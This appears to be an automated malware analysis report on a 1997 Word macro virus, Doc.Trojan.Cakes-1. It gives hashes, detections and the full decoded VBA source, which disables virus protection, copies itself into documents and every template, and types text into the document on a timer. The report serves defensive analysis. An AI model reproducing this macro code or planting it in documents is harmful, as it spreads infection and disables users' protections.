Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d1557bac6cd6aa1e…

MALICIOUS

Office (OLE)

29.5 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 469203da484f64624ef28a2f0b35f79b SHA-1: 28c4a790ab7048761da937fde52a95c83b5ee7ad SHA-256: d1557bac6cd6aa1ef62ce1328c8f78b9c486a8a882627f230ecbcf5bdb42274f
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1553.005 Mark-of-the-Web Bypass

The sample contains legacy WordBasic and VBA macros, including an AutoOpen macro that attempts to disable virus protection and copy itself to other documents and templates. This behavior is indicative of a macro-based worm or self-propagating malware. The ClamAV detection 'Doc.Trojan.Cakes-1' further supports its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Cakes-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Cakes-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9291 bytes
SHA-256: 5524b02b1672335179bd4026fcfd8e9fc2a93b261d92fd0abd9a615890094578
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "L_"
'V1.1
'4/10/97
'MJRN-MF-TA
Const Refresh = "00:50:00"
Const Boom = "28/3/"
Sub AutoNew()
        Options.VirusProtection = True
        On Error Resume Next
        Application.OrganizerCopy _
            Source:=ThisDocument.FullName, _
            Destination:=ActiveDocument.FullName, _
            Name:="L_", _
            Object:=wdOrganizerObjectProjectItems
        For Each d In Templates
        If (ThisDocument.FullName <> d.FullName) Then
            Application.OrganizerDelete _
            Source:=d.FullName, _
            Name:="L_", Object:=wdOrganizerObjectProjectItems
            Application.OrganizerCopy _
                Source:=ThisDocument.FullName, _
                Destination:=d.FullName, _
                Name:="L_", _
                Object:=wdOrganizerObjectProjectItems
            d.Save
        End If
        Next d
End Sub
Sub AutoOpen()
        Options.VirusProtection = False
        On Error Resume Next
        If (ThisDocument.FullName <> ActiveDocument.FullName) Then
            Application.OrganizerDelete _
                Source:=ActiveDocument.FullName, _
                Name:="L_", Object:=wdOrganizerObjectProjectItems
            Application.OrganizerCopy _
                Source:=ThisDocument.FullName, _
                Destination:=ActiveDocument.FullName, _
                Name:="L_", _
                Object:=wdOrganizerObjectProjectItems
            ActiveDocument.Save
        End If
        For Each d In Templates
        If (ThisDocument.FullName <> d.FullName) Then
            Application.OrganizerDelete _
                Source:=d.FullName, _
                Name:="L_", Object:=wdOrganizerObjectProjectItems
            Application.OrganizerCopy _
                Source:=ThisDocument.FullName, _
                Destination:=d.FullName, _
                Name:="L_", _
                Object:=wdOrganizerObjectProjectItems
            d.Save
        End If
        Next d
End Sub
Sub AutoExec()
        Options.VirusProtection = False
        On Error Resume Next
        
        Dim f As Integer
        f = FreeFile
        Dim c As Integer
        Open "C:\WINDOWS\MAJORANA.E" For Append As f Len = Len(c)
        
        c = Rnd * 1000
        Write #f, c
        Close f
        
        Dim v As Date
        v = DateValue(Boom & Year(Now))
        If (Date >= v) And (Date <= v + 2) Then
            Application.OnTime when:=Now + TimeValue(Refresh), Name:="L_.effetto"
        Else
            Application.OnTime when:=Now + TimeValue(Refresh), Name:="L_.effetto2"
        End If
End Sub
Sub effetto()
    On Error Resume Next
    v = MsgBox("Hello! This is time of cakes.", , "Hello?")
End Sub
Sub effetto2()
    On Error Resume Next
    s = " Ettore Majorana (1906-1938?) "
    Selection.TypeText Text:=s
    Application.OnTime when:=Now + TimeValue(Refresh), Name:="L_.effetto2"
End Sub


' Processing file: /opt/analyzer/scan_staging/754945aac2894d6b9d16bc05dcffb7bc.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/L_ - 4253 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0004 "V1.1"
' Line #1:
' 	QuoteRem 0x0000 0x0007 "4/10/97"
' Line #2:
' 	QuoteRem 0x0000 0x000A "MJRN-MF-TA"
' Line #3:
' 	Dim (Const) 
' 	LitStr 0x0008 "00:50:00"
' 	VarDefn Refresh
' Line #4:
' 	Dim (Const) 
' 	LitStr 0x0005 "28/3/"
' 	VarDefn Boom
' Line #5:
' 	FuncDefn (Sub AutoNew())
' Line #6:
' 	LitVarSpecial (True)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #7:
' 	OnError (Resume Next) 
' Line #8:
' 	LineCont 0x0010 03 00 0C 00 09 00 0C 00 0F 00 0C 00 13 00 0C 00
' 	Ld ThisDocument 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld ActiveDocument 
' 	MemLd Full
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.